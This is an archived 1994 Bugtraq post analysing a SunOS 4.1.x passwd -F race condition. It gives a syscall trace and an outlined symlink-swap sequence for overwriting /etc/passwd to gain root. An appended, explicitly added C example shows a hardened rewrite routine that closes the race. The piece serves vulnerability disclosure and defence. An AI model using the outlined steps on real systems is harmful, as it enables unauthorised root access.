Bugtraq mailing list archives
Re: Sun Patch Id #102060-01
From: mouse () Collatz McRCIM McGill EDU (der Mouse)
Date: Mon, 19 Dec 1994 04:30:38 -0500
So does anybody know more about this one??? I've tried a few things, but haven't figured it out yet. [...]
Problem Description:
1169007: Security: Root access possible on SunOS 4.1.x via forced passwd race condition.
This patch restricts the use of the passwd command's -F option [...]
I just now did a simple experiment: I copied /etc/passwd to /tmp/gleep and ran "passwd -F /tmp/gleep" under the control of trc. Here's the trace, edited to emphasize the relevant excerpts:

open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 3
	[this is the first time /tmp/gleep appears in the trace]
fstat (3, 0xf7fff704) = 0
read (3, 0xc708, 8192) = 448: [the passwd file]
close (3) = 0
gethostname (0x9ae0, 64) = 0: [our hostname]
ioctl (1, 0x40125401=TCGETA, 0xf7ffefe4) = 0: tio=[...]
write (1, 0xf78028d0="Changing password for mouse on [hostname].\n", 58) = 58
access (0xf77247d7="/etc/security/passwd.adjunct", 0x0=F_OK) = -1 ENOENT (No such file or directory)
	[I don't know how this may interact with shadow passwords.]
open (0xf7723ae5="/dev/tty", 0x0=O_RDONLY) = 3
	[catch SIGINT]
	[frob tty settings]
	[read new password]
	[do it all over again, for second copy of new password]
	[do a bunch of signal stuff: SIGHUP, SIGINT, SIGQUIT, SIGTSTP]
umask (0000) = 0022
open (0xcb80="/tmp/ptmp", 0xa01=O_WRONLY|O_CREAT|O_EXCL, 0644) = 3
	[experimentation indicates the directory portion is taken from /tmp/gleep's directory portion]
getdtablesize () = 64
setrlimit (0x0=RLIMIT_CPU, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
setrlimit (0x1=RLIMIT_FSIZE, 0xf7fff878=cur=INFINITY max=INFINITY) = 0
open (0xf7fffa2e="/tmp/gleep", 0x0=O_RDONLY) = 4
fstat (4, 0xf7fff7dc) = 0
read (4, 0xcb98, 8192) = 448: [the passwd file]
fstat (3, 0xf7fff058) = 0
read (4, 0xcb98, 8192) = 0:
close (4) = 0
write (3, 0xeba0=[the passwd file with modified entry], 448) = 448
close (3) = 0
rename (0xcb80="/tmp/ptmp", 0xf7fffa2e="/tmp/gleep") = 0

Thus, my idea of how one can exploit this [note: this is not an exploit script!] would be:

% mkdir bar
% cp /etc/passwd bar
[edit bar/passwd to have a known root password]
% ln -s /etc foo
% passwd -F $cwd/foo/passwd

Now, you need to relink foo to point to bar, somewhere between the open of $cwd/foo/ptmp and the open of $cwd/tmp/passwd, and then relink it back before the rename() occurs. If the passwd file is large, hitting the second window may not be hard.

der Mouse
mouse () collatz mcrcim mcgill edu
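The window in the trace above exists because passwd resolves the -F path by name three separate times (open, open again, rename), so a path component can be retargeted between them. As an added example, not code from the post or from SunOS, here is the same rewrite sequence with the directory pinned to a descriptor once and every later step done relative to it with the POSIX openat/renameat/unlinkat calls (which did not exist on SunOS 4.1.x); replace_in_dir and self_check are my own names, and the passwd entry is constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Rewrite "name" inside "dir": the directory is resolved once and every later
 * step goes through that descriptor, so relinking a path component mid-sequence
 * (as described in the post) changes nothing. */
static int replace_in_dir(const char *dir, const char *name,
                          const char *data, size_t len)
{
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0) return -1;
    /* The target must exist and must not be a symlink (O_NOFOLLOW refuses one). */
    int ofd = openat(dfd, name, O_RDONLY | O_NOFOLLOW);
    if (ofd < 0) { close(dfd); return -1; }
    close(ofd);
    /* O_EXCL rejects a pre-placed "ptmp"; the name is relative to dfd, not cwd. */
    int tfd = openat(dfd, "ptmp", O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (tfd < 0) { close(dfd); return -1; }
    ssize_t w = write(tfd, data, len);
    int rc = (close(tfd) == 0 && w == (ssize_t)len)
             ? renameat(dfd, "ptmp", dfd, name) : -1;   /* atomic swap via dfd */
    if (rc < 0) unlinkat(dfd, "ptmp", 0);
    close(dfd);
    return rc;
}

/* Self-check on a constructed temp dir: 0 if a plain file is replaced and a symlinked target refused. */
int self_check(void)
{
    char dir[] = "/tmp/pwXXXXXX", path[64], buf[64];
    const char *newdata = "root:x:0:0:root:/:/bin/sh\n";   /* constructed entry */
    if (!mkdtemp(dir)) return -1;
    snprintf(path, sizeof path, "%s/passwd", dir);
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs("root:old\n", f); fclose(f);
    int ok = replace_in_dir(dir, "passwd", newdata, strlen(newdata)) == 0;
    f = fopen(path, "r");
    size_t n = f ? fread(buf, 1, sizeof buf - 1, f) : 0;
    if (f) fclose(f); buf[n] = '\0';
    ok = ok && strcmp(buf, newdata) == 0 && unlink(path) == 0;
    /* Now make "passwd" a symlink; the hardened routine must refuse it. */
    ok = ok && symlink("/dev/null", path) == 0 &&
         replace_in_dir(dir, "passwd", newdata, strlen(newdata)) != 0;
    unlink(path); rmdir(dir);
    return ok ? 0 : -1;
}
```

Pinning the directory is what closes the window; a symlink swapped in for foo after open() is never consulted again, and a symlinked target file is rejected outright rather than followed.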